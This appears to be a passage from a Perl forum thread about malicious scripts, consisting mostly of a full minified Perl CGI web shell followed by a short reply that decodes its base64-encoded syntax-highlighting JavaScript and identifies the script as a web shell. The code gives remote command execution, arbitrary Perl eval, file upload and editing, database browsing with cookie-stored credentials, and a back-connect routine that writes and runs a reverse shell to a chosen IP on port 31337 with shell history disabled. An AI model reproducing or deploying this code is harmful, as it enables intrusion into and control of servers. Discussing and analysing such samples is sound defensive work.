"<h1>Console:</h1>$div";$Prompt = $WinNT ? 
"$OldD +ir> " : "[$ServerName $OldDir]\$ ";print "$Prompt $RunCommand";}else{ +&PrintPageHeader("c");&history;print "<h1>Console:</h1>$div";$Prompt += $WinNT ? "$CurrentDir> " : "[$ServerName $CurrentDir]\$ ";print "$P +rompt $RunCommand<pre>";$Command = "cd \"$CurrentDir\"".$CmdSep.$RunC +ommand.$Redirector;if(!$WinNT){$SIG{'ALRM'}=\&CommandTimeout;alarm($C +ommandTimeoutDuration);}if($ShowDynamicOutput){$|=1;$Command .= " |"; +open(CommandOutput, $Command);while(<CommandOutput>){$_=~s/(\n|\r\n)$ +//;print "$_\n";}$|=0;}else{print `$Command`;}if(!$WinNT){alarm(0);}p +rint "</pre>";}ConsoleP();&PrintPageFooter;}sub ExecuteCommand{my $pa +th=$in{'path'};$CurrentDir=$in{'d'};$CurrentDir=~s!\Q//!/!g;if($RunCo +mmand eq "changedir"){$RunCommand="cd $ChangeDir";}elsif($RunCommand +eq "makedir"){$RunCommand="mkdir $MkDir";}elsif($RunCommand eq "makef +ile"){$RunCommand="touch $MakeFile";}elsif($RunCommand eq "zip"){$Run +Command="tar cfz ".$ZipArch.".tar.gz ".$ZipFile;}elsif($RunCommand eq + "unzip"){$RunCommand="tar xfz ".$UnZipArch;}elsif($RunCommand eq "de +lfile"){$RunCommand="rm ".$DelFile;}elsif($RunCommand eq "deldir"){$R +unCommand = "rm -rf ".$DelDir;}elsif($RunCommand eq "chmod_file"){my +$tempt=$in{'chmod'};$RunCommand="chmod $tempt $path";}elsif($RunComma +nd eq "rename_file"){my $rtempt=$in{'rename_file'};$RunCommand="mv $p +ath $CurrentDir/$rtempt";}elsif($RunCommand eq "touch_file"){my $ttem +pt=$in{'touch_file'};$ttempt=~s!\Q-!!g;$ttempt=~s!\Q:!!g;$ttempt=~s/ +//g;my $ar=substr($ttempt,12);my $al=substr($ttempt,0,12);$ttempt=$al +.".".$ar;$RunCommand="touch -t $ttempt $path";}if($RunCommand=~m/^\s* +cd\s+(.+)/){$OldDir=$CurrentDir;$Command="cd \"$CurrentDir\"".$CmdSep +."cd $1".$CmdSep.$CmdPwd;chop($CurrentDir=`$Command`);&PrintPageHeade +r("c");file_header();print "<font size=1>";$Prompt=$WinNT?"$OldDir> " + : "[$ServerName $OldDir]\$ ";print "$Prompt $RunCommand";}else{&Prin +tPageHeader("c");file_header();print "<font size=1>";$Prompt=$WinNT?" 
+$CurrentDir> " : "[$ServerName $CurrentDir]\$ ";print "$Prompt $RunCo +mmand<pre>";$Command="cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redire +ctor;if(!$WinNT){$SIG{'ALRM'}=\&CommandTimeout;alarm($CommandTimeoutD +uration);}if($ShowDynamicOutput){$|=1;$Command .= " |";open(CommandOu +tput, $Command);while(<CommandOutput>){$_ =~ s/(\n|\r\n)$//;print "$_ +\n";}$|=0;}else{print `$Command`;}if(!$WinNT){alarm(0);}print "</pre> +";}print "</font>";&PrintCommandLineInputForm;&PrintPageFooter;}sub S +endFileToBrowser($){open (FILE, $_[0]);local ($/);$file=<FILE>;close +(FILE);($f=$_[0])=~m!([^/^\\]*)$!;print "Content-type: application/x- +unknown\n";print "Content-Disposition: attachment;filename=".$1."\n"; +print "Content-Description: File to download\n\n";print $file;}sub Sy +stemInfo{sub langs{$s="which gcc perl python php tar zip";$s.=" -U $q +{u}"if($q{u});return $s;}sub hdd{$s="df -h";$s.=" -U $q{u}"if($q{u}); +return $s;}sub hdd1{$s="mount";$s.=" -U $q{u}"if($q{u});return $s;}su +b perlv{$s="perl -v";$s.=" -U $q{u}"if($q{u});return $s;}sub phpv{$s= +"php -v";$s.=" -U $q{u}"if($q{u});return $s;}sub hosts{$s="cat /etc/h +osts";$s.=" -U $q{u}"if($q{u});return $s;}sub downloaders{$s="which l +ynx links wget GET fetch curl";$s.=" -U $q{u}"if($q{u});return $s;}su +b httpd{$s="locate httpd.conf";$s.=" -U $q{u}"if($q{u});return $s;}$l +angs=langs();$httpd=httpd();$hdd1=hdd1();$hdd=hdd();$perlv=perlv();$p +hpv=phpv();$hosts=hosts();$downloaders=downloaders();&PrintPageHeader +("c");print "<h1>System information</h1>";print "$div$tab<td><span>HD +D[mount]:</span>$div";P(`$hdd1`);print "$dive</td><td><span>HDD[df -h +]:</span>$div";P(`$hdd`);print "<tr><td><span>PATHS:</span>$div";P(`$ +langs`);print "$dive</td><td><span>DOWNLOADERS:</span>$div";P(`$downl +oaders`);print "$dive</td></tr><tr><td><span>PERL version:</span>$div +";P(`$perlv`);print "$dive</td><td><span>PHP version:</span>$div";P(` +$phpv`);print "$dive</td></tr><tr><td><span>/etc/hosts:</span>$div";P 
+(`$hosts`);print "$dive</td><td><span>httpd.conf:</span>$div";P(`$htt +pd`);print "$dive</td></tr>$tabe$dive";&PrintPageFooter;}sub sql_logi +nform{print "<h1>DataBases manager</h1>";&GetCookies;$hhost=$Cookies{ +'hhost'};$pport=$Cookies{'pport'};$usser=$Cookies{'usser'};$passs=$Co +okies{'passs'};$dbb=$Cookies{'dbb'};if(!$hhost){$hhost='localhost'};i +f(!$pport){$pport='3306'};if(!$usser){$usser='root'};print <<END; <form name='sf' method='post'><table cellpadding='2' cellspacing='0'>< +tr><td>Type</td><td>Host</td><td>Port</td><td>Login</td><td>Password< +/td><td>Database</td><td></td></tr><tr><td><select name='type' id='nn +ame'><option value='mysql' selected>MySql</option><option value='pgsq +l'>PostgreSql</option></select></td><td><input type=text name=sql_hos +t value=$hhost></td><td><input type=text name=sql_port value=$pport>< +/td><td><input type=text name=sql_login value=$usser></td><td><input +type=text name=sql_pass value=$passs></td><td><input type=text name=s +ql_db value=$dbb></td><input type="hidden" name="d" value="$CurrentDi +r"><input type="hidden" name="a" value="sql_connect"><td><input type= +submit value='>>'></td></tr>$tabe</form><br><script>document.getEleme +ntById('nname').focus();</script> END }sub sql{use DBI;&PrintPageHeader("p");sql_loginform();sql_query_form( +);&PrintVar;&PrintPageFooter;}sub sql_vars_set{$hhost=$in{'sql_host'} +;$pport=$in{'sql_port'};$usser=$in{'sql_login'};$passs=$in{'sql_pass' +};$dbb=$in{'sql_db'};}sub sql_query_form{ print <<END; $tab<td><span>Current query:</span></td><td><form name='querys' method +='post'><textarea name='query' cols=70 style='width:100%;height:60px' +>$zapros</textarea><br/><input type=submit value='Query'><input type= +"hidden" name="d" value="$CurrentDir"><input type="hidden" name="a" v +alue="sql_query"></form></td>$tabe$tabe END }sub sql_cq_form{print <<END; $tab<td><span>Get data from columns:</span></td><td><form name='cquery +s' method='post'><textarea name='cquery' id='cquery' 
cols=40 style='w +idth:100%;height:60px'></textarea><br/><input type="hidden" name="a" +value="sql_query"><input type="hidden" name="d" value="$CurrentDir">< +input type=submit value='Query'></form></td> END }sub sql_databases_form{print '<tr><form method=post name=dd'.$$ref[0] +.'><input type="hidden" name="a" value="sql_databases"><input type=hi +dden name=database value='.$$ref[0].'><input type="hidden" name="d" v +alue="'.$CurrentDir.'"><td></font><font face="Verdana" size="1">['.$s +4et.']</font></td><td><a href="javascript:document.dd'.$$ref[0].'.sub +mit()"><font face="Verdana" size="1">'.' '.$$ref[0].'</font></a></td> +</form></tr>';}sub sql_tables_form {print '<tr><form method=post name +=tt'.$$ref[0].'><input type="hidden" name="a" value="sql_tables"><inp +ut type=hidden name=table value='.$$ref[0].'><input type="hidden" nam +e="d" value="'.$CurrentDir.'"><td></font><font face="Verdana" size="1 +">['.$s4et.']</font></td><td><a href="javascript:document.tt'.$$ref[0 +].'.submit()"><font face="Verdana" size="1">'.' '.$$ref[0].'</font></ +a></td></form></tr>';}sub sql_columns_form{print '<script>function lo +l'.$s4et.'(f){if(f.checked){var cn=document.getElementById("cquery"). +value;if(cn!==""){document.cquerys.cquery.value=cn+","+f.id;}else{doc +ument.cquerys.cquery.value=f.id;}}else{exit;}}</script><tr><form meth +od=post name=cc'.$$ref[0].'><input type="hidden" name="a" value="sql_ +columns"><input type=hidden name=column value='.$$ref[0].'><input typ +e="hidden" name="d" value="'.$CurrentDir.'">';print '<td></font><font + face="Verdana" size="1">['.$s4et.']</font></td><td><input type=check +box id='.$$ref[0].' name=c'.$$ref[0].' onClick="lol'.$s4et.'(this.for +m.c'.$$ref[0].')"></td><td><a href="javascript:document.cc'.$$ref[0]. 
+'.submit()"><font face="Verdana" size="1">'.$$ref[0].'</font></a></td +></form><tr>';}sub sql_data_form {print '<tr><form method=post name=d +t'.$$ref[0].'><input type="hidden" name="d" value="'.$CurrentDir.'">< +td>'.$verd.'['.$s4et.'] </font></td><td>'.$verd.$$ref[0].'</font></td +></form></tr>';}sub NetPrint{&PrintPageHeader("p");NetForm();&PrintPa +geFooter;}sub NetForm {$rip = $ENV{'REMOTE_ADDR'};print <<END; <h1>Back-connect [perl]</h1><br/><form name='nfp' method=post>Server: + <input type='text' name='server' value=$rip> Port: <input type='text +' name='ppport' value=31337><input type="hidden" name="a" value="net_ +go"><input type=submit value='>>'></form><br> END &PrintVar;}sub back{open(FILE,">/tmp/bbc.pl");$bbc='#!/usr/bin/perl us +e IO::Socket;$system="/bin/bash";use Socket;use FileHandle;socket(SOC +KET,PF_INET,SOCK_STREAM,getprotobyname("tcp")) or die print "[-] Unab +le to Resolve Host\n";connect(SOCKET,sockaddr_in("'.$port.'",inet_ato +n("'.$target.'"))) or die print "[-] Unable to Connect Host\n";SOCKET +->autoflush();open(STDIN, ">&SOCKET");open(STDOUT,">&SOCKET");open(ST +DERR,">&SOCKET");system("unset HISTFILE;unset SAVEHIST;echo PPS 3.0 b +ackconnect:;pwd;");system($system);';print FILE $bbc;close(FILE);syst +em("chmod 777 /tmp/bbc.pl;perl /tmp/bbc.pl $target $port");exit;}sub +NetGo{&PrintPageHeader("c");$target=$in{'server'};$port=$in{'ppport'} +;NetForm();back();&PrintPageFooter;}sub EvalCodePrint{&PrintPageHeade +r("p");EvalCodeForm();&PrintPageFooter;}sub EvalCodeForm{print <<END; <h1>Execution PERL-code</h1><form name=pf method=post><textarea name=c +ode class=bigarea id=PerlCode></textarea><input type="hidden" name="a +" value="eval_code"><input type=submit value=Eval style="margin-top:5 +px"> END }sub EvalCode{&PrintPageHeader("c");EvalCodeForm();$ccode=$in{'code'}; +print "<br>Result:<br>";eval $ccode;&PrintPageFooter;}sub EditFilePat +hForm {print <<END; <code><br><form name=pfsd method=post>$Prompt<input type="text" name=p +ath 
id=edit1_file><input type="hidden" name="a" value="edit_file_path +"><input type="hidden" name="d" value="$CurrentDir"><input type=submi +t value=MakeDir></form></code> END }sub EditFilePath{$fpath="";$fpath=$CurrentDir."/".$ViewF;EditFilePrin +t();}sub EditFilePrint{&PrintPageHeader("p");EditFileForm();&PrintPag +eFooter;}sub EditFileForm{open(FILE, $fpath);@file=<FILE>;$fccodde=Ht +mlSpecialChars(join('', @file));print '<h1>File tools:</h1>';&RTP_EDI +T;print <<END; <div class=content><form name=pf11 method=post><textarea name=ccode cl +ass=bigarea id=editfile>$fccodde</textarea><input type="hidden" name= +"a" value="edit_file"><input type=hidden name=path value=$fpath><inpu +t type="hidden" name="d" value="$CurrentDir"><input type=submit value +=Save style="margin-top:5px"></form></div> END &PrintVar;&PrintPageFooter;}sub ViewFile{$fpath=$CurrentDir."/".$ViewF +;&PrintPageHeader("c");open(FILE,$fpath);@file=<FILE>;$fccodde=join(' +',@file);$fccodde=HtmlSpecialChars($fccodde);print '<h1>File tools:</ +h1>';&RTP_EDIT;print decode_base64("PHNjcmlwdD5mdW5jdGlvbiBjb2xvcihjb +2RlKXt2YXIgcz1bXTt2YXIgYz0iJyI7cmV0dXJuIGNvZGUucmVwbGFjZSgvXGIoY2FzZX +xjYXRjaHxjb250aW51ZXxkb3xlbmRkb3xlbHNlfGVsaWZ8ZWxzZWlmfGlmZGVmfGlmbmR +lZnxlbmRpZnxmb3J8Zm9yZWFjaHxpZnxmaXxzd2l0Y2h8dHJ5fHR5cGVvZnx3aGlsZXx3 +aXRofGJyZWFrfGluY2x1ZGV8cmVxdWlyZXxyZXF1aXJlX29uY2V8Zm9wZW58ZnB1dHN8Z +nJlYWR8ZmlsZV9nZXRfY29udGVudHN8ZmlsZV9wdXRfY29udGVudHN8cHJlZ19yZXBsYW +NlfGltcG9ydHxleGNlcHR8ZGVmaW5lfGRlZmluZWR8dW5kZWYpXGIvZ2ltLCc8c3Bhbj4 +kMTwvc3Bhbj4nKS5yZXBsYWNlKC8oe3x9KS9naW0sJzxzcGFuPiQxPC9zcGFuPicpLnJl +cGxhY2UoL1xiKGZ1bmN0aW9ufHN1YnxkZWZ8dm9pZHxpbnR8cmV0dXJufGV2YWx8YXNzZ +XJ0fGV4ZWNsfGV4ZWN2fGV4ZWN2ZXxleGVjfGV4ZWNwfGRpZVwoXCkpXGIvZ2ltLCc8Yj +48Zm9udCBjb2xvcj0jMDBmZmZmPiQxPC9mb250PjwvYj4nKS5yZXBsYWNlKC9cYihzdHJ +1Y3R8ZXhpdHxjbGFzc3xzeXN0ZW18cHJpbnR8cHJpbnRmfGVjaG98c3ByaW50ZnxmcHJp +bnRmfHZhclxzKVxiL2dpbSwnPGI+JDE8L2I+JykucmVwbGFjZSgvXGIoMHhbXGRhLXpdK 
+3xcZCspXGIvZ2ltLCAnPGZvbnQgY29sb3I9I2ZmYTA3YT4kMTwvZm9udD4nKS5yZXBsYW +NlKC8oXFx4W1xkYS16XSopL2dpbSwgJzxmb250IGNvbG9yPSNmZmEwN2E+JDE8L2ZvbnQ ++JykucmVwbGFjZSgvXGIoaHR0cFw6XC9cLypcLz98aHR0cHNcOlwvXC8qXC8/fGZ0cFw6 +XC9cLypcLz8pXGIvZ2ltLCc8dT48Zm9udCBjb2xvcj0jZmFmYWQyPiQxPC91PjwvZm9ud +D4nKS5yZXBsYWNlKC8oIi4qPyJ8Jy4qPycpL2csJzxmb250IGNvbG9yPSNmYWZhZDI+JD +E8L2ZvbnQ+JykucmVwbGFjZSgvKFwvXCouKlwqXC98XC9cLy4qKS9naW0sJzxmb250IGN +vbG9yPSM2OTY5Njk+JDE8L2ZvbnQ+JykucmVwbGFjZSgvKFwvXCpbXHNcU10qP1wqXC8p +L2dpbSwnPGZvbnQgY29sb3I9IzY5Njk2OT4kMTwvZm9udD4nKS5yZXBsYWNlKC8oXiMuK +iQpL2dpbSwnPGI+PGZvbnQgY29sb3I9IzY5Njk2OT4kMTwvZm9udD48L2I+JykucmVwbG +FjZSgvKFwkW19hLXowLTldKikvZ2ltLCc8Yj48Zm9udCBjb2xvcj0jOThmYjk4PiQxPC9 +mb250PjwvYj4nKS5yZXBsYWNlKC88cihcZCspPi9naW0sZnVuY3Rpb24obWF0Y2gsaWQp +e3ZhciByPXNbaWQtMV07dmFyIGNzcz1yLm1hdGNoKC9eKFwvXC98XC9cKnwtKS8pPydjb +21tZW50JzpyLm1hdGNoKC9eWyYnXS8pPydzdHJpbmcnOidyZWdleHAnO3JldHVybiAnPH +NwYW4gY2xhc3M9IicrY3NzKyciPicrcisnPC9zcGFuPic7fSl9O2Z1bmN0aW9uIGNoYW5 +nZVRleHQoKXt2YXIgYT1kb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnY2Njb2RlZScpLmlu +bmVySFRNTDthPWNvbG9yKGEpO2RvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdjY2NvZGVlJ +ykuaW5uZXJIVE1MPWE7fTwvc2NyaXB0Pg=="); print"<div class=content><pre class=ml1 id='cccodee'>$fccodde</pre></d +iv>";&PrintVar;&PrintPageFooter;}sub EditFile {&PrintPageHeader("c"); +$fccode=$in{'ccode'};$ffpath=$in{"path"};print <<END; <h1>File: $ffpath saved</h1><form name=pf11 method=post><textarea name +=ccode class=bigarea id=editfile>$fccode</textarea><input type="hidde +n" name="a" value="filemanager"><niput type=hidden name=path value=$f +fpath><input type="hidden" name="ddd" value="$ViewF"><input type="hid +den" name="d" value="$CurrentDir"><input type=submit value=Files styl +e="margin-top:5px"></form> END open(FFF,"> $ffpath");print FFF DeHtmlSpecialChars($fccode);close(FFF) +;&PrintVar;&PrintPageFooter;}sub jquery{print '<script>document.query +s.query.value="'.$zapros.'";</script>';}sub sql_columns{&GetCookies;$ 
+hhost=$Cookies{'hhost'};$pport=$Cookies{'pport'};$usser=$Cookies{'uss +er'};$passs=$Cookies{'passs'};$dbb=$Cookies{'dbb'};$table=$Cookies{'t +able'};&PrintPageHeader("c");sql_vars_set();sql_loginform();$column=$ +in{'column'};print <<END; <script>function setCookie(name,value,expires,path,domain,secure){docu +ment.cookie=name+"="+escape(value)+((expires)?";expires="+expires:"") ++((path)?";path="+path:"")+((domain)?";domain="+domain:"")+((secure)? +";secure":"");}setCookie("column","$column","","/");</script> END print "$tbb$verd";$dbh=DBI->connect("DBI:mysql:$dbb:$hhost:$pport",$us +ser,$passs);$sth=$dbh->prepare("SHOW DATABASES");$sth->execute;print +"<b>DATABASES:</b><br><td><table border=1 cellspacing=0 cellpadding=1 +>";while($ref=$sth->fetchrow_arrayref){$s4et++;sql_databases_form();} +$rc=$sth->finish;print "$tabe</td><td>$tab<td>";$zapros="SHOW TABLES +FROM $dbb";sql_cq_form();print "</td><td>";sql_query_form();print "$t +abe</td>$tabe";$s4et=0;$sth=$dbh->prepare($zapros);$sth->execute;prin +t $tabe;print "<b>Tables from $dbb:</b><br><table border=1 cellspacin +g=0 cellpadding=1 cols=4><td><table border=1 cellspacing=0 cellpaddin +g=1 cols=2>";while($ref=$sth->fetchrow_arrayref){$s4et++;sql_tables_f +orm();}$rc=$sth->finish;print "$tabe</td><td><table border=1 cellspac +ing=0 cellpadding=1 cols=2>";$s4et=0;$sth=$dbh->prepare("show columns + from $table from $dbb");$sth->execute;while($ref=$sth->fetchrow_arra +yref){$s4et++;sql_columns_form();}$rc=$sth->finish;print "$tabe</td>" +;$s4et=0;$zapros="SELECT $column FROM `".$dbb."`.`".$table."` LIMIT 0 +,30";jquery();$sth=$dbh->prepare($zapros);$sth->execute;print "<td><t +able border=1 cellspacing=0 cellpadding=1 cols=2>";while($ref=$sth->f +etchrow_arrayref){$s4et++;sql_data_form();}$rc=$sth->finish;$rc=$dbh- +>disconnect;print "$tabe</td>$tabe";&PrintPageFooter;}sub sql_tables{ +&GetCookies;$hhost=$Cookies{'hhost'};$pport=$Cookies{'pport'};$usser= 
+$Cookies{'usser'};$passs=$Cookies{'passs'};$dbb=$Cookies{'dbb'};&Prin +tPageHeader("c");sql_vars_set();sql_loginform();$qqquery=$in{'table'} +;print <<END; <script>function setCookie(name,value,expires,path,domain,secure){docu +ment.cookie=name+"="+escape(value)+((expires)?";expires="+expires:"") ++((path)?";path="+path:"")+((domain)?";domain="+domain:"")+((secure)? +";secure":"");}setCookie("table","$qqquery","","/");</script> END print "$tbb$verd";$dbh=DBI->connect("DBI:mysql:$dbb:$hhost:$pport",$us +ser,$passs);$sth=$dbh->prepare('SHOW DATABASES');$sth->execute;print +"<b>DATABASES:</b><br><td><table border=1 cellspacing=0 cellpadding=1 +>";jquery();while($ref=$sth->fetchrow_arrayref){$s4et++;sql_databases +_form();}$rc=$sth->finish;print "$tabe</td><td>$tab<td>";sql_cq_form( +);print "</td><td>";sql_query_form();print "</td>$tabe</td>$tabe";$s4 +et=0;$sth=$dbh->prepare("SHOW TABLES FROM $dbb");$sth->execute;print +"<b>Tables from $dbb:</b><br><table border=1 cellspacing=0 cellpaddin +g=1 cols=4><td><table border=1 cellspacing=0 cellpadding=1 cols=2>";w +hile($ref=$sth->fetchrow_arrayref){$s4et++;sql_tables_form();}$rc=$st +h->finish;print "$tabe</td><td><table border=1 cellspacing=0 cellpadd +ing=1 cols=2>";$s4et=0;$zapros="SHOW COLUMNS FROM `$qqquery` FROM `$d +bb`";jquery();$sth=$dbh->prepare($zapros);$sth->execute;while($ref=$s +th->fetchrow_arrayref){$s4et++;sql_columns_form();}$rc=$sth->finish;$ +rc=$dbh->disconnect;print "$tabe</td>$tabe";&PrintPageFooter;}sub sql +_databases{sql_vars_set();&PrintPageHeader("c");sql_vars_set();sql_lo +ginform();$ddb=$in{'database'};print <<END; <script>function setCookie(name,value,expires,path,domain,secure){docu +ment.cookie=name+"="+escape(value)+((expires)?";expires="+expires:"") ++((path)?";path="+path:"")+((domain)?";domain="+domain:"")+((secure)? 
+";secure":"");}setCookie("dbb","$ddb","","/");</script> END print "$tbb$verd";$dbh=DBI->connect("DBI:mysql:$dbb:$hhost:$pport",$us +ser,$passs);$sth = $dbh->prepare("SHOW DATABASES");$sth->execute;prin +t "<b>DATABASES:</b><br><td><table border=1 cellspacing=0 cellpadding +=1>";while($ref=$sth->fetchrow_arrayref){$s4et++;sql_databases_form() +;}$rc=$sth->finish;print "$tabe</td><td>$tbb>";sql_query_form();print + "$tabe</td>$tabe";$s4et=0;$zapros="SHOW TABLES FROM `$ddb`";jquery() +;$sth=$dbh->prepare($zapros);$sth->execute;print "$tabe";print "<b>Ta +bles from $ddb:</b><br>";print "<table border=1 cellspacing=0 cellpad +ding=1 cols=10>";while($ref=$sth->fetchrow_arrayref){$s4et++;sql_tabl +es_form();}$s4et=0;$rc=$sth->finish;$rc=$dbh->disconnect;print "$tabe +";&PrintVar;&PrintPageFooter;}sub sql_set_cookie{print "Set-Cookie: h +host=$hhost;\n";print "Set-Cookie: pport=$pport;\n";print "Set-Cookie +: usser=$usser;\n";print "Set-Cookie: passs=$passs;\n";print "Set-Coo +kie: dbb=$dbb;\n";}sub sql_query{sql_vars_set();&GetCookies;$hhost=$C +ookies{'hhost'};$pport=$Cookies{'pport'};$usser=$Cookies{'usser'};$pa +sss=$Cookies{'passs'};$dbb=$Cookies{'dbb'};$table=$Cookies{'table'};& +PrintPageHeader("c");sql_vars_set();sql_loginform();$qquery=$in{'cque +ry'};if($qquery){$qquery="SELECT CONCAT_WS(0x3a,$qquery) FROM `$dbb`. 
+`$table` LIMIT 0,30";}else{$qquery=$in{'query'};}$dbh=DBI->connect("D +BI:mysql:$dbb:$hhost:$pport",$usser,$passs);$sth=$dbh->prepare("SHOW +DATABASES");$sth->execute;print "$verd<table width=100% cellspacing=0 + cellpadding=1 cols=2><b>DATABASES:</b><td><table border=1 cellspacin +g=0 cellpadding=1>";while($ref=$sth->fetchrow_arrayref){$s4et++;sql_d +atabases_form();}$rc=$sth->finish;print "$tabe</td><td>$tbb>";sql_que +ry_form();print "$tabe</td>$tabe";$s4et=0;$sth=$dbh->prepare($qquery) +;$sth->execute;print "<b>Results:</b><br>";print "<table border=1 cel +lspacing=0 cellpadding=1 cols=10>";while($ref=$sth->fetchrow_arrayref +){$s4et++;print "<tr><td>$verd [$s4et]</font></td><td>".$verd.$$ref[0 +]."</font></td></tr>";}$s4et=0;$rc=$sth->finish;$rc=$dbh->disconnect; +print "$tabe";print '<script>document.querys.query.value="'.$qquery.' +";</script>';&PrintVar;&PrintPageFooter;}sub sql_connect{sql_vars_set +();sql_set_cookie();&PrintPageHeader("c");sql_loginform();sql_vars_se +t();$s4et=0;$dbb="";$dbh=DBI->connect("DBI:mysql:$dbb:$hhost:$pport", +$usser,$passs);if($hhost && $pport && $usser && $passs){$zapros="SHOW + DATABASES";jquery();$sth=$dbh->prepare($zapros);$sth->execute;print +"$verd $tbb<b>DATABASES:</b><td><table border=1 cellspacing=0 cellpad +ding=1>";while($ref=$sth->fetchrow_arrayref){$s4et++;sql_databases_fo +rm();}$rc=$sth->finish;print "$tabe</td><td>";sql_query_form();print +"</td>$tabe";$rc = $dbh->disconnect;print '</font>';return;}print "So +me error...</font>";&PrintVar;&PrintPageFooter;}sub UploadFile{if($Tr +ansferFile eq ""){&PrintPageHeader("f");file_header();&PrintCommandLi +neInputForm;&PrintFileUploadForm;&PrintPageFooter;return;}&PrintPageH +eader("c");file_header();print "<font size=1>Uploading $TransferFile +to $CurrentDir...<br>";chop($TargetName) if($TargetName = $CurrentDir +) =~ m/[\\\/]$/;$TransferFile =~ m!([^/^\\]*)$!;$TargetName .= $PathS +ep.$1;$TargetFileSize = length($in{'filedata'});if(open(UPLOADFILE, " 
+>$TargetName")){binmode(UPLOADFILE) if $WinNT;print UPLOADFILE $in{'f +iledata'};close(UPLOADFILE);print "Transfered $TargetFileSize Bytes.< +br>";print "File Path: $TargetName<br>";}else{print "Failed: $!<br>"; +}print "</font>";&PrintCommandLineInputForm;&PrintPageFooter;}sub Rem +ove{use Cwd qw(abs_path);my $path=abs_path($0);system("rm $path");}&R +eadParse;&GetCookies;$ScriptLocation=$ENV{'SCRIPT_NAME'};$ServerName= +$ENV{'SERVER_NAME'};$LoginPassword=$in{'p'};$RunCommand=$in{'c'};$Run +Command2=$in{'l11'};if($RunCommand2){$RunCommand=$RunCommand2}$RunCom +mand1=$in{'aliases'};if($RunCommand1){$RunCommand=$RunCommand1}$RunCo +mmand2=$in{'group'};if($RunCommand2){$gr=$Cookies{'f'};$gre='';$gr=~s +/\%([A-Fa-f0-9]{2})/pack('C',hex($1))/seg;@grr=split(/\s/,$gr);if($Ru +nCommand2 eq "untar"){foreach $arg(@grr){if($arg ne '..'){$gre.="tar +xfz $arg;"}}}if($RunCommand2 eq "tar"){foreach $arg(@grr){if($arg ne +'..'){$arg1.=' '.$arg}}$gre="tar cfz z_$$.tar.gz".$arg1;}if($RunComma +nd2 eq "delete"){foreach $arg(@grr){if($arg ne '..'){$arg1.=' '.$arg} +}$gre="rm -rf$arg1";}$RunCommand=$gre;}$ChangeDir=$in{'cc'};$ZipFile= +$in{'zip'};$ZipArch=$in{'arh_name'};$UnZipArch=$in{'unzip_name'};$Del +File=$in{'del_file'};$DelDir=$in{'del_dir'};$MkDir=$in{'md'};$ViewF=$ +in{'path'};$Fchmod=$in{'fchmod'};$Fdata=$in{'fdata'};$MakeFile=$in{'m +f'};$TransferFile=$in{'f'};$Options=$in{'o'};$Action=$in{'a'};$Action +="filemanager" if($Action eq "");$CurrentDir=$in{'d'};chop($CurrentDi +r=`$CmdPwd`) if($CurrentDir eq "");$LoggedIn=$Cookies{'SAVEDPWD'} eq +$Password;if($Action eq "login" || !$LoggedIn){&PerformLogin;}elsif($ +Action eq "command"){&ExecuteCommand;}elsif($Action eq "RT"){&RT;}els +if($Action eq "view_file"){&ViewFile;}elsif($Action eq "command1"){&E +xecuteCommand1;}elsif($Action eq "filemanager"){&FileManager;}elsif($ +Action eq "console"){&Console;}elsif($Action eq "upload"){&UploadFile +;}elsif($Action eq "download"){&SendFileToBrowser($CurrentDir."/".$Tr 
+ansferFile);}elsif($Action eq "systeminfo"){&SystemInfo;}elsif($Actio +n eq "code"){&EvalCodePrint;}elsif($Action eq "eval_code"){&EvalCode; +}elsif($Action eq "net"){&NetPrint;}elsif($Action eq "net_go"){&NetGo +;}elsif($Action eq "sql"){&sql;}elsif($Action eq "sql_connect"){&sql_ +connect;}elsif($Action eq "sql_query"){&sql_query;}elsif($Action eq " +remove"){&Remove;}elsif($Action eq "edit_file"){&EditFile;}elsif($Act +ion eq "edit_file_path"){&EditFilePath;}elsif($Action eq "sql_databas +es"){&sql_databases;}elsif($Action eq "sql_tables"){&sql_tables;}elsi +f($Action eq "sql_columns"){&sql_columns;}elsif($Action eq "logout"){ +&PerformLogout;}

Re^3: Malicious Perl Scripts & Web Development
by Lotus1 (Vicar) on Apr 12, 2019 at 20:35 UTC

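    Interesting. I'll let the Monks who are more experienced with web development comment on the script overall, but I noticed the print decode_base64("PHNj...") call and decided to try to decode it. It is some JavaScript(?) that has been Base64-encoded, and it seems to do nothing more than keyword color highlighting for program code; in the listing it is printed by sub ViewFile just before the contents of the file being viewed. That blob being harmless does not make the script harmless: the rest of the listing passes request parameters to backticks, a piped open() and a string eval, which is what makes it a web shell. I first used a webpage to decode it and then the following script.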

    The result is:

    I reformatted it slightly to try to make sense of it but I don't have the time or patience to take this any further. Good luck.